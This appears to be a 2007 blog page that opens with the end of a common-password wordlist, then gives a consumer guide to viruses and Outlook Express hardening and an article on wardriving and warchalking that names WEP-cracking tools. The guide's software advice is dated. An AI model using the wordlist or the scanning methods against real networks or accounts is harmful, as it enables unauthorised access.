yellow3
yellow4
yellow5
yellow6
yellow7
yellow8
yellow9
yellow98
yesterday
yhvhxa
yokoono
yolanda
yosemite
youngin
yousuck
youyou
ys9kf4r
ytrewq
yuep2g
yvonne
yxwvus
yxwvust
yxwvustr
yyy123
yyyyyy
yyyyyyy
yyyyyyyy
z1vcni7
z1x2c3
z1z2z3
z6m9t4r
zachary
zackary
zaq1xsw2
zaxxon
zebra1
zebras
zeppelin
ziggy
zigzag
zigzag1
zimmerman
zipdisk
zipdrive
zipper
zippers
zippos
zippys
ziy6g3g6
zmodem
zombie
zone69
zonker
zxc123
zxcvbn
zxcvbnm
zyx321
zyxwvu
zyxwvus
zyxwvust
zz123zz
zzy2rmr
zzz123
zzz1234
zzz321
zzz4321
zzzzzz
zzzzzzz
zzzzzzzz

Viruses & how to protect yourself from them

March 3, 2007

——————————————-
Viruses & how to protect yourself from them
——————————————-

Synopsis: an introduction to viruses and how to protect
against them by using practical techniques and anti-virus software.
Some technical discussion at the end. Aimed at users on computers
running Windows as opposed to network administrators.
Outlook Express covered in depth.

0. Introduction.
This is a 15 page article introducing the topic of viruses and
what you can do to protect yourselves. If you do not have the time
to read it, there are three simple points to remember:

I.               NEVER OPEN EMAIL ATTACHMENTS

II.              INSTALL ANTI-VIRUS SOFTWARE

III.             KEEP YOUR ANTI-VIRUS SOFTWARE UPDATED

Anti-virus software is a must, but it is not a catchall.
You need to educate yourself and users as well as to what sort of
behaviour is going to open your system to viruses.

1. What is a virus?
A virus is a piece of software or code which when run will harm
your computer in some way. What makes them dangerous is that they
are able to use features on your computer to spread themselves
(“propagate”); most viruses are an outright threat to your security
and privacy in many different ways.

There are thousands of different viruses to be found on the Internet
(referred to as being “in the wild”). They do different things to
your computer and propagate in different ways.
In terms of their destructive ability some have the ability to crash
your computer and destroy files. Others install dangerous packages on
your computer that allow others to control it when connected to the
Internet, which means they use your computer to hack / attack other
computer systems. Yet other are more interested in finding out
personal details and credit card numbers and sending them back to
the virus creator.

Some viruses are know to actually email some of your files out across
the Internet, as has apparently happened to the Ukrainian secret
service, and the Japanese police. [4]

Many viruses currently use people email address books to propagate
through the Internet. They are growing more sophisticated all the
time, and sometimes the virus will send itself out to one of your
contacts using the name of another of your contacts. Thus, if you
get an email from bob@privacybasics.info then the chances are that
Bob is completely innocent and that the real ‘culprit’ is a mutual
contact. The only way to confirm which computer the virus actually
originated in is by checking the email headers (see our article on
how to do this at http://www.privacybasics.info/email.html).

Other viruses simply make up email addresses to send to, so others
end up getting loads of emails with subjects like “message
undeliverable”, often carrying a copy of the viruses themselves,
as other servers automatically bounce the email back to the supposed
sender. This does not necessarily mean that you have a virus (even
if the return message indicates as such), but more likely that
someone with your email in their address book has it, and you are
unfortunately getting the fallout instead. The technique of using
false or other people’s email addresses is known as
‘email spoofing’ (for a short overview see

http://www.cert.org/tech_tips/email_spoofing.htm).

Anti-virus software is not the same as a “firewall”.
A firewall performs a different type of function, though the
generally complements each other. You should have both anti-virus
and firewall software; many manufacturers offer them together as a
suite.

Some viruses actually attempt to fight back against previous viruses,
uninstalling them, however this is not acceptable behaviour and just
as much an intrusion; plus, how sure that these new viruses are as
beneficial as they make out to be?

Note: the term virus comes from early analogies with the biological
virus, a self-replicating bit of code that does little good to
anyone who contracts them. Various experts quibble over just how far
this analogy can be drawn, but for simple understanding of viruses it
is a good enough analogy.  We will adopt the plural form viruses,
though some people prefer the grammatically accurate version of virii.

Protecting yourself against viruses is not just about protecting
yourself, but showing a basic courtesy to all your contacts as well.
Allowing yourself to become infected will not win you any gratitude.

2. What is Anti-Virus software
Anti Virus software [AV] is a programme designed specifically
to defend your computer against viruses and other dangerous software
[referred to as ‘malware’]. It comes in a variety of types and
functions, but all perform the same basic function. They examine
your system and its actions waiting for signs of malicious code or
specific actions that would compromise your computer.

Depending on how it has been designed and you have configured the
software, it will either warn your that there is a danger or take
action immediately to isolate the threat (some times referred to
as “quarantine”); or both.

For the most part AV software works in the background, only coming
appearing when it detects a risk and acts as you tell. However,
generally the allow you to call them on command to check
files/programmes before you use them.

The most popular, commercial, anti-virus programmes are

Norton (http://www.symantec.com/)
McAfee (http://www.mcafee.com/)
Sophos (http://www.sophos.com/)
Kaspersky (http://www.kaspersky.com/)
F-Secure (http://www.f-secure.com/)
MessageLabs (http://www.messagelabs.com/)
Good, free anti-virus software for windows we can recommend is
AVG from http://www.grisoft.com/; this is a better solution than
switching between free trials of AV software each time they expire.
You should also be aware that anti-virus software, which comes
bundled with new computers, might have an expiry date, after which
they will no longer protect you – check for this and ensure that your
AV software is still active.

3. How to get a virus
Viruses propagate in a number of ways. Modern viruses will actually
use a number of different ways.

Emails
One of the most common ways, especially with Windows based viruses,
is through email. The virus accesses files associated with your email
software, mainly they focus on Outlook Express, reading through it to
gather email addresses. It then copies itself to send out an email to
your contacts, sometimes in your name, sometimes in the name of
another person on your list of contacts.

By doing this, the authors of the virus hope that the recipient
knowing the ‘sender’ will be tricked into opening the
email/attachments and thus infect their computer in turn. Often
they use messages designed to put off fears, or encourage people
to click on the attachments.

Spam also can carry viruses as well as advertising products. Some
attempt to trick people into downloading files from websites that
carry viruses.

Techniques to reduce spam will also have the benefit of reducing the
risk from viruses.

There are two main ways of transmitting through email. Attachments
are probably the most common form; they require people to open the
attachment for the virus to be able to infect. It is for this reason
that anti-virus experts constantly emphasis the message of not
opening attachments and to double-check them.

The other method is through the use of HTML emails, that is emails
with fancy designs and images in them. These are based on the same
technology as web pages and can hide interesting things like
JavaScript and ActiveX, which in Outlook Express can create holes
virus writers can exploit. Increasingly, this means that simply
opening up html enabled email or using preview panes is enough to
get the virus to automatically infect, or be downloaded from the
Internet. The simple and effective solution is to configure your
email programme to switch to text only mode.

Internet
Files from the Internet are not always as they seem.
Downloading files whether from websites or file-sharing (p2p)
software such as Kazaa, carry the risk that they are viruses or
have viruses attached.

Likewise there are methods for sending files across IM systems that
also have viruses attached. Viruses can also send themselves via IM.

Floppies / CD
The first viruses were transmitted by floppy disks. Though not as
common a method of propagating viruses as it once was, it is still
around and needs to be guarded against. Files are infected with a
virus, which are then passed to other people who put the files on
their own system and accidentally activate the virus that then
spreads to other files on the computer.

Networks
If a virus infects one computer on a network it can spread through
the network to all the other machines. This is why anti-virus
software needs to be active on every computer in a network, or
that have permission to attach it. It only takes one user on the
network to slip up and everyone to suffer the effect.

Note 1
As well as being programmes in themselves, viruses can insert
themselves inside files or other programmes without actually harming
the file itself. When the latter are opened or run, the virus is
also activated. In many cases the virus can be stripped from the
file leaving it save to use.

Note 2
When a virus sends itself out in an email, the recipients may not
exist and bounce back. If the email has been sent in your name then
it returns to you, even though it may not have come from your system,
the rejection will be sent to you. Likewise, if the recipient’s
system rejects the email on the grounds that it has a virus attached,
it will also send the bounce message back to the person in the
“To:” or “Reply-To:” field, even if they have had nothing to do with
it. See the second website in [3] for a ‘rant’ on this issue.

4. Disinfecting
If you have contracted infected by a virus you need to take immediate
action and follow these steps.

Take you computer off the Internet immediately.
Make a note of the effects of the virus
Find out just what you have been infected with (note, the name
of a virus may differ from one anti-virus company to another).
Disinfect your computer
Update your anti-virus software
Update with the latest patches or versions the software that has
been affected.
Check that no floppies or other storage devices have been affected
either, otherwise you could end up re-infecting yourself and others
all over again.
Most anti-virus software creators have sections on their website which
have descriptions of viruses and what should be done about them to
remove them from your computer. Some now supply programmes, often
free, for the more common viruses, which will help you disinfect
your computer. If you cannot find it your AV software supplier’s
site, check the website of it’s competitors

Not all anti-virus software is good at letting you know what it is
that has infected you. Do not panic when a warning appears, but
work through it methodically until you have identified the threat
and dealt with it. On windows systems, disinfecting will normally
involve removing several files and editing the ‘registry’. It is
important that once you have removed the infection, that you fix
your software, whether updating the anti-virus software or the other
software which allowed the virus to infect in the first place,
otherwise there is little to stop you getting infected all over again.

Even with all the best practices in place, it is not possible to
guarantee 100% that one will not hit your computer. If the virus is
particularly malicious this could cost you all your data and even the
computer itself. This is another reason why making backups is
important. You should also make sure you have boot disks available in
case the virus deletes vital files needed by your operating system
to work.

5. Basics tips for everyone
Many techniques use ‘social engineering’ techniques to get you to
believe that the message is genuine and from a friend of yours.
If the message doesn’t explicitly say what is in the file, or you are
not expecting it, or even that the language seem vague and unlike
your contact’s normal messages then be suspicious. It is not hard
to fake an email as if it came from another address.

Using Email
DON’T OPEN ATTACHMENTS; this is the most important bit of advice
currently available. Simple but effective. It does not matter if the
attachment appears to come from a friend or is something you are
interested in. If it is not expected then don’t trust it.
Turn off any features in email, which automatically launch attachments.
In Windows turn off WSH (Windows Shell Hosting), and other scripting
features as this is what allows some viruses to activate without the
recipient’s consent. Switch to text only mode, both for sending and
receiving emails. Watch out for specific file attachments such as .vbs,
.bat, .scr, .exe and .pif, all of which are generally viruses. Set
the rules/filters on your email programme to automatically trash any
messages with attachments containing these extensions as they will
serve no purpose other than virus transmission.
Also scrutinise .zip files, as these are increasingly common sources
for transmitting a virus, though they have legitimate uses as well.
Anti-virus software can now scan inside these files, but only to a
certain dept. If a zip file has been ‘zipped up’ a good number of
times, then treat it with the utmost caution. If it is very rare
for you to get .zip files, then simply block such messages altogether.

A problem with zip files is that it is that not all AV software can
scan inside them if they are password protected. However, in order to
get you to open the file, they have to send you the password. So if
you get an email with a password-protected zip file and a message
giving you the password, then it is a good bet it is a virus, or a
contact with zero grasp of security concepts. Friends and contacts do
not suddenly start sending you this sort of message, so that should
be another sign to be suspicious. Watch out for generic messages that
do not say anything of substance. If in doubt, ask the sender if they
have actually sent the email/attachment. Don’t listen to what
unsolicited messages of advice say – especially if they tell you to
delete files. Generally it is best to ignore these messages as spam;
or check on anti-hoax or anti-virus websites to see if it is a scam.
Messages from “admin@your-isp.com”, bill.gates@microsoft.com,
staff@symantic.com etc are generally fakes, and should be
ignored – especially if they are asking you to open attachments. Emails
posing as cures or preventions for other virus attacks are likely to
be viruses themselves and should be deleted. On the Internet
Downloading files – scan all files before using them. This goes
whether the files are from websites obtained through file-sharing
programmes. Some websites attempt to install software on your computer
in order to work properly. This should not be automatic and a
warning message should appear. If this happens, DO NOT say ‘yes’ to
it. It is far safer to leave the website immediately. Instant
Messaging now allows files to be transmitted. Some viruses can spread
by pushing infected files at other people on the network. If you are
not expecting a file from one of your ‘contacts’ take precautions
first and check before opening. CDs & Floppy disks
Check any files you copy onto your computer, or before opening them.
Ideally, you will have active anti-virus software which will
automatically scan files / programmes and alert you to any threats.

Be suspicious of any disks of unknown origins. Likewise, just because
your friend has passed you a file, it does not mean that it is safe
as they might not be taking the right precautions themselves and may
not realise that they are infected. Tell them!

CDs offering software, etc, on the front of magazines are not
completely immune either.

Anti-Virus Software
Make sure you keep your AV software up-to-date (see next section).
Check the website of the software you are using for tips and
guidelines to keeping your AV software working at it’s best.
Activate your AV software so it is working all the time, and not
just when you are suspicious of a file. Update your software
Many viruses act by exploiting flaws the software you use, or the
underlying operating system. Do not just trust to anti-virus software
to protect yourself. You can help yourself considerably by keeping
your software up to date and applying any appropriate patches.
Ideally, you will set time aside to check the websites associated
with your various programmes for any updates as may need to be
applied. If you use Windows and Outlook Express/Internet Explorer
on Windows, we rate updating on a regular basis as these programmes
are among the main targets of virus writers. In particular, we
recommend using an alternative to Outlook Express (see below for
more details).

Final notes. Windows is by far the operating system most at risk from
viruses. However, that does not mean users of other operating systems
are automatically safe. Numbers of Linux viruses are increasing now,
but Linux is still harder to infect due to the way it works. Viruses
for the Mac are few and far between, though they do exist; with Macs
the main thing is to avoid opening attachments.

6. Live Updates
Viruses are continually changing and new ones written all the time.
This is an ‘industry’ which is showing little sign of diminishing.

In order to work, your anti-virus software needs a list of viruses
and malicious code to check against. This list has to be kept
up-to-date so the software will recognise the latest threats. There is
no point having anti-virus software that only recognizes threats
created before 2003.

All good AV software will have a ‘live update’ type feature, which
needs to be activated. This allows the anti-virus software to connect
to a web page on the Internet and download the latest details of
things to check for. Depending on the software you are using and how
often you use the Internet, you will need to set the live update
feature to automatically check at appropriate times. We recommend
doing it at least once a week, and preferably aim for at least once
a day (especially if using broadband).

If, following a live update, a virus is subsequently detected on your
computer, then take action immediately.

In order for live update to work, then the AV programme has to access
the Internet. This activity may be detected up by monitoring
programmes such as firewalls, which in turn alerts you. Check on a
search engine for the name of the programmes causing an alert and
ensure check if it is related to your AV software.

There is a constant struggle between virus writers and anti-virus
software companies, though there is a lot of hype from the latter.
This is not helped by constantly changing software and operating
system offering new opportunities and flaws that need defending.

7. Windows
Windows as the major operating system is the most targeted by virus
writers.  Within Windows, Outlook and Outlook Express are the
programmes most at risk, followed by file-sharing (P2P) programmes.

We will focus on Outlook / Outlook Express as this is one of
commonest email programmes used but also one of the most flawed.
As a result virus writers quite often target Outlook. However, some
of what we discuss below is just applicable to other email programmes.
They are still vulnerable to some attacks, and it may be the case
that in the future they will become more susceptible as virus authors
turn their attention to them.

Alternatives to Outlook Express
Our honest advice is to get rid of Outlook Express for another
programme. Eudora (www.eudora.com) and Pegasus (www.pmail.com) are
two programmes that are free and similar to Outlook Express,
but with less security issues.

Of the three, Pegasus has the strongest reputation for security,
having it built in as a concept from the beginning; however it does
have a somewhat quirky layout. Eudora has a good reputation for
security, but still has some holes in it; however if you are still
getting comfortable using computers, it is a better option when moving
away from Outlook Express as the layout is similar. They are discussed
in more dept below.

A new programme gaining ground and reputation is Thunderbird,
based on the open source Mozilla project
(www.mozilla.org/products/thunderbird/). Though, still in early
release, good things are being said of it, and it is being developed
with security as a feature as opposed to an optional extra. Again,
see below for more details.

If you are changing away from OE, once you have saved all the material
you want from it, it is best to uninstall the programme from the
system, especially if it is an old version of the programme.

Outlook Express (OE)
If changing your email programme is not an option, then there are some
steps you can take in Outlook Express to minimise the effect of being
hit by virus. A summary of these are:

Update to Outlook Express 6
(the version number will appear in the starting up pane under or
next to the words Outlook Express).
Set the security zone to “restricted’ – this has the effect of
disabling active scripting (ActiveX, Java). See below for details.
Read messages in plain text, turning off the HTML format.
See below for details. This has the effect of disabling risky
scripting features,  and enhancing privacy by stopping webbugs used
to track people’s activities.
Disable the address book by simply not putting contact details into
it. OE 6 has attempted to deal with some of the flaws facilitating
abuse of the address book by viruses, but this seems to only work
if OE 6 is the default email programme. This does not protect you as
such but will certainly make a difference should you ever become
infected with a virus that will attempt to infect all your contacts
and friends. See below for more details.
Set content filters to delete messages with the extensions .vbs,
.com, .bat, .scr, .exe and .pif . See below for more details. This
feature is only available with OE 6; earlier versions do not have this, and we recommend upgrading just to get this. However, it is possible to apply a security patch to protect earlier versions of OE – see :http://office.microsoft.com/Downloads/2000/Out2ksec.aspx
Set OE to filter any email with two or three extensions.
Disable the preview pane; this feature allows some code to run
automatically and can inadvertently run viruses embedded in other
files. See below on how to do this. Visit http://www.windowsupdate.com/
regularly to check for any updates and patches which must be applied
to keep OE secure (can be found under Product Updates -> Critical)
Depending on the version of Outlook you are using, some of the above
should already be set by default. Others are not. It is worth
checking through the settings to ensure that all is working as it
should.

The following instructions are optimised for Outlook Express 6.
Sorry, that it seems quite long, but that again is evidence of
security not being a primary concern of Microsoft when developing
its software. There may be some differences in the Outlook 5 series
but they should be recognizable, though we recommend you upgrade or
patch as much as possible.

Setting the Security Zone

Under the Tools menu, select Options.
In the window pane that now appears chose the Security tab.
You are now offered a choice several zones, including
“Restricted Sites Zone” and “Internet Zone”. The former has less
functionality but is more secure, the two going hand in hand. We
recommend it setting the “Restricted Sites Zone” as the default. In
practice have found that people are not greatly impacted as the
average users does not need or use the greater functionality.
Other zones such as “Trusted Sites” and “Local Intranet” are not
particularly good options either as you are still trusting others to
be secure.  If the “Restricted Sites Zone” is not present, you should
still have “Internet Zone”  – select that and configure it in the
same way as we are now going to suggest you configure what is in the
“Restricted Sites Zone”. Control of what is in the
“Restricted Sites Zone” is done through Internet Explorer as follows:

Click Custom Level
In the list that appears, scroll through and disable all
options related to Java and ActiveX. This will affect some websites,
but the security gained is much more useful. Disabling javascript
will have a major impact on viewing websites, so is left alone.
Other features worth ensuring are disable are

i.     “Access data sources across domains”

ii.    “Drag and drop or copy and paste files”

iii.   “Installation of desktop items”

iv.    “Launching programs and files in an iFrame”

Effectively, almost everything in this list can be disabled.
v.   At the “software channel permissions” option, set to high safety.

Note: selection the “high” option for the restriction level is
insufficient; Custom Level must be chosen and tailored for this to be
effective. This cross programme integration may appear useful in
theory, but falls down because the options are insufficient, in that
it is not possible to directly disable JavaScript in email messages.
To do this, we need to return to the Outlook Express option pane and
disable the ability to view HTML/JavaScript by switching to the Text
Only option. This is less pretty but far safer.

On the other hand, setting the Restricted Zone in Internet Explorer
affects both IE and OE at once, leading to better security in the
former as well.

A page with images from some of the above process may be found at

http://www.codecutters.org/outlook/

Setting the Text Only option
Still in the Options window pane, select the Read tab.
In the set of choices labelled “Reading Messages” check the box next
to “Read all messages in plain text”.
Note: if this does not appear in your version of Outlook Express you
may need to install the Internet Explorer 6 service pack 1 (IE6 – SP1).
See http://www.windowsupdate.com/ to get this.

Filtering out virus related attachments
Still in the Options window pane, go back to the Security tab.
In the set of choices labelled “Virus Protection”, click the box next
to “Do not allow attachments to be saved or opened that could
potentially be a virus”. Unfortunately this option requires settings
in Internet Explorer as well. When finished setting Outlook Express
you may need to do the following on your Windows computer
Click Start -> Settings (or Control Panel). An alternative route in
WinXP is use the Classic View -> View all control panel options.
Select Folder Options.
Select File Types
This should let you see if the file extensions above
(.scr, .pif, .vbs,  etc) are listed. If not, you will need to add
them. Double-Click on each of the extensions for the ‘dangerous’ set
we’ve noted above and ensure that the box called “Confirm open after
download” is checked. This will stop Windows automatically running
files with these extensions, thereby potentially automatically
opening files and programmes with viruses.
Also in the “Virus Protection” set, check the box labelled
“Warn me when other applications try to send emails as me.” Such
warning will alert you to the possibility that a virus has slipped
through and is active on your computer. However, if you are using
other email programmes as well as OE, then conflicts may arise.
If the above options are not available, as is generally in Outlook
versions earlier than 6, look for an option in OE to set Rules for
incoming emails, and use this feature to filter out attachments with
the extensions warned against above. An advantage of doing it this
way, is that virus infected messages are immediately trashed without
you having to bother them.
Note: When a file attachment in Outlook Express has been blocked, the
following message will appear in the message alert bar for the email
message: “Outlook Express removed access to the following unsafe
attachments in your email: file.xxx”, where file.xxx is the name of
the file with the prohibited extension.

Older Outlook versions may have an Attachment Security option –
select to high.
Protecting others
In the Options windowpane select Send.
In the “Mail Sending Format”  box select “Plain Text”
Uncheck the box labelled “Automatically put people I reply to in
my Address book”.
Open up the address book and delete all entries.
Click OK to close the Option windowpane and save the changes
you have made.
Turning off the Preview Pane
Go to View -> Layout -> Preview Pane.
Deactivate the view preview pane option.
Restart Outlook to enable these changes.
Outlook Express hides by default the extension of a file –
this is the three letters at the end of a filename which lets Windows
know what type of file it is and thus what programme it works with.
Some virus writers exploit this by giving the virus an extra
extension to lull users into believing it is safe, for example
file.pdf.scr. What appears to the user is just file.pdf, dropping
the .scr which would indicate that this is really a virus. This can
be turned off.

Eudora
Available from Qualcomm at http://www.eudora.com/,
it comes in number of varieties, some free and some not.
Though it does not have as much holes as Outlook Express,
it does have a few holes. Unfortunately, Qualcomm is not
forthcoming on what can be done about them.

Rather than duplicate material elsewhere, we refer you to the
following website from About.com which discusses solutions for
securing Eudora: http://antivirus.about.com/library/bleudora.htm

We strongly recommend that you switch to text mode only and avoid
options allowing attachments to be previewed/viewed inline.

The other thing we would add is that Eudora’s filters can be found under Window; though to make a new filter follow special -> make filter… For more information on setting filters in Eudora see http://www.eudora.com/techsupport/tutorials/index.html.
This will allow you to set rules which will block unwanted emails.

Pegasus (Pmail)
Available from http://www.pmail.com, Pegasus has many features that make it
a preferred option over Eudora and Outlook Express, though it’s layout
is not a generic as the other two. It is free to use, though you
have to pay for the manuals. Security has been built in from the
start and it shows.

In particular, it has it’s own way of detailing with HTML emails
which means a number of virus types will not work on it, a feature
not found in many of the more popular software programmes.
JavaScript and ActiveX are not handled, so they cannot open holes.
It may not be as pretty, but it is far more secure, and by not
downloading graphics from the Internet, it helps increase your
privacy as well.

The handling of attachments has been greatly restricted, making it
harder for users to run them (though this is not the case for .doc
files). Nevertheless, the rule of not downloading and/or running
attachments holds, as it will do for all email programmes. The rule
creation ability in Pegasus is strong and can be found under
Tools -> Options -> Viewer Controls.

Thunderbird
Can be downloaded for free for Windows, Linux & Mac OS X at
http://www.mozilla.org/products/thunderbird. Based on the old netscape
browsers, but greatly updated as part of an open source community
project, mozilla and it’s associated email software, Thunderbird, is
gaining a strong reputation for stability and security as well as
being feature rich.

From the point of view of viruses, it has a number of salient
features:

The ability to write very strong rules and filters to block spam and
associated viruses.
JavaScript is turned off by default
It is not possible for viruses to run automatically
(though they can still be activated if saved and run seperately),
even if you preview attachments.
For more information visit http://texturizer.net/thunderbird/faq.html

Though not entirely fully fledged at the time of writing and some
important features not yet working or implemented, we do anticipate
that Thunderbird will develop into a highly recommended piece of
software in the not distant future.

8. Linux & Mac
A. Linux
Linux and other Unix type operating systems can get viruses,
but it is hard work to infect a machine and requires a series of
actions on behalf of the user. There are other advantages to Linux,
that though not protection in themselves, does give rise to barriers
to the spread of viruses:

The culture of Linux makes it a more secure system in general –
though it is still important to patch regularly.
The variety of email programmes and distributions means that no
single programme is dominant in the same way that Outlook Express is
for Windows. The default actions of most of the email programmes are
also generally set with security in mind, as opposed to making
usability the overriding issue.
Both these act as deterrents to virus writers as it will currently
require significant effort to write enough possible variation into a
virus that would be able to propagate any distance into the internet.

Whatever the distribution and email programme you use for Linux, it
is still important to check some basic settings are in place:

i.             Scripts are not run automatically

ii.            Ability to automatically open attachments in
email programmes is switched off, or at least you are
given the option with a warning box if you want to run
it first.

iii.           Settings allow you to prevent your email programme
from downloading images/scripts/etc from remote
servers

iv.            Set the /home directory as noexec.

Some Linux people argue that the above are mostly theoretical;
however as Linux is growing and changing as well, it is good to be
prepared for potential future threats.

Another advantage of Linux is that it is harder to run executable
files. Currently to get a malicious script or programme from an
email or website, it requires the user to do the following:

Save the script/executable.
Unpack it, if it comes as a zip file.
Open up a terminal and change the permissions on the
script/executable (chmod u+x / chmod 700) so that it can be run.
Alternatively, open up a file manager, right click it and change
permissions.
Run it from the command line; or if using a file manager, click the
script/programme.
Of course, social engineering may be able to convince the user to
this, but even then there are obstacles to the spread of the virus,
depending on how root access and the /home directory have been set
up and permissions set for them. Essentially, the user will do little
more than damage their own machine.

At the moment it is far easier to write viruses for
Windows/Outlook Express. Note, with Linux we have focused only on
email-born viruses on stand-alone computers, as opposed to other
transmission methods. Nor have we looked at worms or network born
viruses. However, these are issues more appropriate to system/network
administrators as opposed to average users.

B. Mac
Though there are viruses for the Apple Macintosh operating systems,
it is generally overlooked by the vast majority of virus writers,
making it quite a secure system from this perspective. As a result
there is very little to say on this front. This does not mean that
there are no holes in all Macs, but instances of exploits are few and
active exploits even fewer.

9. How AV software works
This section take a quick look at the technical side to Anti virus
software works by constantly scanning memory, files and programmes as
you use them looking for malicious code.

There are several of different ways this can happen:

Scanning everything on start up
Scanning specific programmes, in particularly Internet related ones.
Scanning external drives such as floppy disks,USB storage media and CDs
Scanning particular files/drives when you ask it to.
Categories a) – c) are referred to as “on-access” as they are
normally triggered by certain actions taking place in the system and
only indirectly through the user’s actions. Category d) is known as
“on-demand’” as the user calls the AV software directly.

In many cases the software will do all of this. The downside is that
this uses up the computer system’s resources. Depending on the
software and the computer, including the operating system, this can
cause the user to find their computer acting very slowly. Another
factor affecting speed is the number of viruses that must be defended
against, especially Windows machines.

This is a security concern in itself. Though it should be emphasised
that security does require time, taking too much time will frustrate
users and they are more likely to disable it, leading to a bigger
security risk.

When it comes to detecting viruses, there are two principle
methods: signatures and heuristics.

A virus signature is a section of code from the virus which clearly
identifies it and so can be used to declare the whole bit of code as
a virus. Anti-virus software companies investigate each virus as it
comes along and their engineers will determine what they think is the
best way for detecting that particular virus; they will then add this
information to their database of viruses which can be accessed across
the Internet by their anti-virus programmes.

In some cases, different viruses are actually variations on each
other (there are some tools available which allow people to write
their own viruses without actually knowing how to code them) and this
allows a virus signature to flag a whole family of viruses.
Pretty much all AV software will use this technique.

The heuristic approach is more proactive. Rather than watching for
viruses, it is a method of judging in advance whether the actions of
a piece of code could be malicious if activated. The advantage is
that it increases the chance of catching the latest viruses quicker
than depending on waiting for the latest live update being detected
and installed.

This approach still needs updates as to what behaviours need to be
watched out for changes as new flaws which can be exploited is
discovered in various software. This approach can be quite intensive
on memory and CPU depending on what extent it is developed so may
not be incorporated in all its forms in all anti-virus software.

Viruses continue to change and adapt and there is no sign of them
abating. Virus writers are matching the defensive techniques being
thrown up against them, and finding new ways. Recent advances
include encryption and polymorphic coding techniques. Virus authors
are also increasingly looking to deal directly with flaws in the
anti-virus software and email filtering tools, exploiting them to
get the emails passed them and in front of the users who think that
they are fully protected against viruses. [6]

Also changing are the uses to which viruses are put to. Initially it
was direct damage to infected files and computers. Currently, they
are used for attacking other computers in Denial of Service attacks
and for putting backdoors into computers to give control of them to
others. Some viruses piggyback on top of others, and inventive
methods of spreading continue to be discovered. As other devices
become more sophisticated, such as hand-helds and phones, they too
will become targets for virus writers. However, the basic advice
remains the same: don’t trust attachments, protect and update.

10. Resources
[0] Further reading:

http://www.datafellows.com/virus-info/virus-news

http://vil.nai.com/villib/alpha.asp

[2] A guide to how the Sophos AV product works is at:

http://www.ciphertrust.com/insider/november2002/sav-overview.htm

[3] Critiques of the Anti-Virus software industry:

http://www.theregister.co.uk/content/55/35579.html

http://www.attrition.org/security/rant/av-spammers.html

A number of writers have pointed out that the various cost estimates
of ‘damage’ done by viruses are at best guesswork, and the figures
released by anti-virus software companies drumming up publicity.

[4] Viruses as a security threat:

http://www.theregister.co.uk/2004/04/07/japanese_keystone_cops/

[5] Statistics on virus infection in UK Businesses:

http://www.theregister.co.uk/content/56/35950.html

[6] Outlook filters exploited to get around content filtering:

http://www.theregister.co.uk/content/56/29137.html

[7] Articles on securing Outlook & Outlook Express

Using Virus Protection Features in Outlook Express 6:

http://support.microsoft.com/?kbid=291387

Patch for OE 5.01:

http://support.microsoft.com/default.aspx?kbid=267580&product=oex

Wireless Scanning – Wardriving Warchalking

March 3, 2007

Wireless Scanning – Wardriving / Warchalking
By Danny “Dr.T” – admin@ebcvg.com

In my previous article about wireless security and hacking, I introduced common security threats in WLANs and ways that wireless hackers use them to break into a wireless network. Before a wireless hacker breaks into a WLAN, he/she must identify a suitable open network to launch her/his attack. This article explains what the common methods for wireless scanning are, and how to get protected against them as well.

What is wireless scanning?

Wireless scanning is a method to find an available wireless network access point. It allows you to identify wireless networks through the use of WNIC (wireless network interface card) running in promiscuous mode and a software that will probe for access points. Once an open wireless access point is found, the wardriver usually maps it, so at the end he would have a map of access points with their properties (SSID, WEP, MAC etc.). Whenever the attacker wants to return into the network, he/she usually logs packets for later analysis, or to run them though a WEP key cracker when a weak key is being used.

There are many different types of wireless scanning. The most known and used scanning method is Wardriving, next comes Warchalking. There are many other methods such as Warstrolling, Warflying etc., however this articles deals with Wardriving and Warchalking only.

Why “War”?

The term “war”, which is used in Wardriving, Warchalking etc., was taken from the old days of WarDialing. WarDialing, the hacking practice of phoning up every extension of a phone network until the number associated with a modem is hit upon, has been replaced by WarDriving with the introduction of wireless LANS.

WarDriving – Let’s take a drive…

Wardriving is the first and well known method used to find available wireless networks (means unsecured). It is usually done with a mobile device such as a laptop or iPaq. Wardriving scanning is accomplished in an easy way: the attacker takes the device with him/her into a car, and detects networks (NetStumbler for Windows, BSD-AriTools for BSD, and airsnort for Linux). Once an open access point is detected, the attacker maps it, explores, or stumbles into a pipe to the internet.

The equipment necessary to WarDrive is: A wireless network interface card (PCMCIA), a device capable of locating itself on a map (GPS, not always necessary), a laptop or any other mobile device, Linux Red Hat or Debian (Windows is not recommended), Wireless tools (WEPCrack, AirSnort etc.).

The equipment is all off the shelf and pretty inexpensive.

WarChalking – The hobo language

“Now a new “language” is developing, WarChalking. The idea is based on the “hobo symbols” and is there to tell persons on the street where there is an open wireless network node, and what the settings are. It may look like incomprehensible squiggles, and most people would walk past thinking it is odd graffiti, but it conveys a lot of info that is understood by the hackers. Furthermore, it is now being adopted by those that are sharing networks voluntarily as a way to give the info out to the community.” – Zig

WarChalking was conceived by a group of friends in June 2002, and published by Matt Jones.

WarChalking is simply drawing a chalk symbol on a wall or pavement to indicate the presence of a wireless network, so that other can easily notice it and the details about it. WarChalking is a the modern version of the hobo sign language, which was used by low-tech kings of the road to alert each other to shelter, food and potential trouble. The chalks symbols are nothing more than giving a visual cue to of a wireless network.

The following are the WarChalking symbols:

Symbol                                      Key

SSID                                      Open Node
)(
Bandwidth

SSID                                      Closed Node
()

WEP Node    SSID   Access Contact
( W )
Bandwidth

Example for a WarChalking symbol:

Retina
)(
1.5

This symbol indicates a open node with SSID “Retina” and bandwidth equal to 1.5MBps.

With the use of these symbols, wardrivers can a lot about the node, and whether this is a worth network. Anyone initiated in the ways of WarChalking will recognize what it means, and get online.

Securing WLANs

Securing a wireless network is much simpler than securing a wired network. Building a secure wireless network can be done within few steps. So, you ask yourself “why then it’s easy to break into a wireless network?” the answer is very simple. Whenever a company wants to connect their employees wirelessly into the company network, the administrators often forget to change the default settings of a router, firewall, access point, enabling WEP and more.

Further more, far too many systems administrators forget that the wireless network extends beyond the walls of a building. There may be security guards at the door, and firewalls on the fixed cable network, but the wireless back door is wide open.

The Wireless network security issues are not discussed in this article. WLANs security issues were discussed in my previous article “Wireless Security & Hacking”.

Links & Sources

http://www.wifimaps.com – Map server listing wireless access points.

http://www.kraftvoll.at/software/index.shtml – GPS driving software for Linux.

http://www.kismetwireless.net – Wireless console bases sniffer. It supports GPS and has a lot of features.

http://airsnort.shmoo.com – Wireless GUI sniffer for breaking WEP keys.

ftp.cs.pdx.edu/pub/mobile – FreeBSD WScan

